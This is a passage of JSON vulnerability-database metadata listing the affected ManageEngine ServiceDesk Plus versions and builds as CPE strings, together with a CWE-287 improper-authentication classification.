"cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9421:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9040:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9234:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9318:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9048:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9226:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11134:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9309:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9405:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9316:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9320:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9407:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9427:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9417:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9044:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11131:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9039:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11126:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9032:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10019:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9401:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9410:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10018:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11135:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9240:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9236:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9225:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9323:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9400:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9425:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10502:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11129:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11122:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9049:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11128:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9029:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9315:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9411:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11146:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9222:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9329:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9402:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11128:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9404:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9313:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9308:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11127:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9223:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11129:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9026:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9237:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9310:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9311:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9220:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9420:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9023:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9336:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9218:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9415:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9238:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11142:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9321:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9019:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9213:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9322:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10016:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11126:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9047:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11134:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11138:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9413:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9307:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9038:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9408:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9042:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9036:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9406:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9221:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9017:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9231:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11130:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9043:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9217:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9041:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9317:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11307:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9230:*:*:*:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "8.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": 